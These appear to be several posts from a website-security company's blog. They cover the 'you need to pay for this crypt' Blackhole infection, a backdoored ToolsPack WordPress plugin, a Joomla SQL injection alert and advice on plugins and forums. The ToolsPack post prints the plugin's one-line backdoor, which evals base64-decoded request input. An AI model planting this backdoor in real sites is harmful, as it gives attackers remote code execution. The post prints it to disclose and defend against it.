“you need to pay for this crypt” infection

We’ve been seeing a lot of this lately, infected websites that have the wording,

you need to pay for this crypt

over and over a few times across the top of the webpages.

This is usually accompanied by some script tags that try to infect the visitor with the Blackhole Kit. (The Blackhole Kit is an exploit used by hackers to try and infect the visitor’s browser with a variety of viruses, trojans and other malware)

On WordPress websites we’ve seen this in the index.php files all over the website. It’s an indication that your website has been infected and needs to be cleaned and hardened.

You can begin by removing the malscript immediately preceeding this text. You can look in the wp-content/index.php which is normally about 30 bytes. With anything malicious in there it will be much larger in file size.

Then, make certain that your WordPress is updated and all plugins too.

We’ve also been seeing many WordPress sites infected due to hackers logging into their wp-admin.


Because there are still many people who believe that having admin as a user and admin as a password is acceptable. Too many people believe that, “Hackers only want the bigger, more heavily visited websites. They won’t bother with mine.”

People. Hackers want all websites. The amount of “low-hanging fruit” needs to be drastically reduced – or better yet, eliminated.

Change your passwords immediately. Make them strong. Make them at least 10 characters and use upper case, lower case, numbers and some punctuation. Take some phrase and convert to a combination of the above.

Take for instance the movie Oceans 11. That can be converted into:


Yes, it’s more difficult to remember. But what’s worse? Remembering your password, or having your website constantly infected?

If you need help cleaning up from an infection, please email me at

Thank you.


What is the ToolsPack plugin?

Over the past 2 weeks we’ve seen many infected WordPress websites. A large portion of these infected WordPress websites had the ToolsPack plugin installed.

This plugin only has one file: /wp-content/plugins/ToolsPack/ToolsPack.php

Inside that file looks like this:

Plugin Name: ToolsPack
Description: Supercharge your WordPress site with powerful features previously only available to users. core release. Keep the plugin updated!
Version: 1.2
Author: Mark Stain
Author URI:
$_REQUEST[e] ? eVAl( base64_decode( $_REQUEST[e] ) ) : exit;

Part of our process in the cleaning of an infected website is determining how the website was infected so we can create a security plan to prevent the website from being infected again.

Many of these infected WordPress websites were “hacked” by stolen login credentials – yes, the WordPress username and password.

How did we find this?

Our process includes log file analysis. We started seeing traffic to the ToolsPack.php file around the same time the files were infected. Closer examination of that file revealed the code listed above.

Some Google searches showed that while the plugin appeared to be marketed as legitimate, it was not.

Further analysis of the datetime stamp on ToolsPack folder and the log files did not show any correlation. In talking with the website owners we had them run virus scans on their computers and everyone of them with the ToolsPack plugin had a virus or trojan on them. This included Apple’s Mac.

Yes, the hackers are infected computers, both PCs and Macs with password stealing trojans. These password stealing trojans are stealing all passwords.

We have worked on many hosting accounts that had FTP accounts added to them. The hackers stole the hosting account username and password, logged in and created their own FTP accounts – with strong passwords of course. :)

Website security is a blended partnership between WeWatchYourWebsite and you. We can watch and update and protect your website, but if the hackers are logging in as you, we cannot prevent that.

Strong passwords, renaming the admin account and all the security related plugins would not prevent this type of attack. You may be alerted to the new plugin being installed, but by then, your account has already been compromised.

We suggest you run a full virus scan on your computer, yes even on your Mac, at least once a week. Be certain that the signatures are updated every day as well.

If you assistance in recovering from this infection, please contact me directly at: or by phone at: (847)728-0214.

Thank you.


com_avreloaded needs to be updated

Joomla plugin security alert!

According to the author of the Joomla plugin AllVideos Reloaded:

Security Alert
A serious SQL injection vulnerability was just found in AllVideos Reloaded! A zero-day exploit already exists in the wild, which uses this vulnerability in order to steal your user-database!

All users of version 1.2.6 and below, update to version 1.2.7 immediately!

For those who want to keep their database of customized players/tags/rippers, use the package named and simply install it over the existing version using Joomla’s extension installer. All other users: Use the regular (full) installer package.

Please check your sites and if you’re using this plugin, please update immediately.

Have any other plugins you’re concerned with?

Post here with what they are and we’ll check them out for you.


WordPress plugin wp-phpmyadmin should be removed

If anyone reading this blog has wp-phpmyadmin installed on their site you should remove it immediately.

For the past 2 months we’ve been seeing more and more websites with this plugin being infected.

There is usually a file added: upgrade.php that is not part of the legitimate files and has various malicious code inside.

This plugin is no longer on the WordPress plugin repository as it has not been updated since 2007.

While a plugin like this might seem more convenient for database work than using your hosting provider’s control panel, it’s also more convenient for hackers.

We did a Google search on this and found that the majority of websites with this plugin, also don’t have any prevention for viewing the directory this is installed in.

This means that a hacker can click on “Parent Directory” and see all the plugins installed. While this isn’t a huge vulnerability, it’s so easy to prevent with a either a .htaccess file or an empty index.html file.

The less information a hacker knows about your website the better off you are.

What about you? Do you have this installed on your website? Are there other plugins you worry about? Leave a comment here and we’ll investigate it.

Need your website cleaned, protected and monitored? Send us an email:


Forums Under Attack

If you’ve ever visited a forum before, you know how helpful they can be.

These very same forums can also harm you. Well not you personally, but your computer. And if you’re like me, your computer is an extension of you.

Want to start some really heated discussion in a forum? Write a post that declares whatever forum software you use is the best and safest. I’ve seen many of these posts and the name calling and defensive posture people take over their decision to use one forum software over another is sometimes ridiculous.

After scanning many, many forums for people, we’ve come to discover 2 things:

  1. None of them are always safe
  2. They’re all safe – sometimes

In order to better understand the above you have to get into the mind of a hacker.

Hackers don’t hack just to hack. They now hack for money. Their income depends on how many computers they can infect and remotely control. They need to reach as many computers as possible because they know their “hacks” won’t work on every computer.

They’re playing a numbers game.

Let’s see now, where can they reach thousands of people unaware of their malicious intent?

AH HA! Forums.

Many people visit forums to solve a problem. When you’re looking for a new web hosting provider, you can go to or other such forums. When you’re looking to solve a problem with a cascading style sheet you can search for “forum CSS” and you’ll find a ton of sites offering you contact with potential solutions.

In other words, your guard is down. You’re focused on getting an answer to your question or a solution to your problem. If a window pops up asking you to install something, you might just be tempted to follow along just so you can get to your end result.

And after all, forums are safe, right?

In our work, we’ve seen Drupal, phpBB, vBulletin, php Fusion and Joomla based sites all hacked. Sometimes it’s the plugins used. Other times it’s a carefully crafted SQL injection. Or it could be a remote file injection attack that succeeds. Whatever the attack vector, the point is that every website is a target for hackers. The scans we do today may not uncover an exploit discovered tomorrow.

It’s part of our daily routine to scan the forums and chat rooms that hackers use to discover what they know. Our business is a game of chase and the hackers are always leading the way. 

I’m not saying you should never visit forums, that would be ridiculous. I visit them all the time. What I am saying is that you have to be just as careful when visiting forums as you would just viewing any webpage. Don’t click on things you aren’t 100% sure are safe.

Another thing to discuss is when people change their forum or blogging software because they’ve been hacked.

I just read a posting that read, “we were using phpBB and we were hacked (twice), the second time nothing could be done to retrieve our forum and to wipe everything and start from scratch. Drupal was recommended to us so we decided to give it a whirl.”

Why, after spending so much time learning one system, would you change to something else? Why not spend some time learning how to lock down your existing system? Why not ask questions of other forum owners, how they keep their forum from being a hacker victim?

Maybe I’m wrong on this, but that’s what makes sense to me. If I’m wrong or if you disagree, please voice your opinion with a comment or two.

Thank you for your time and attention.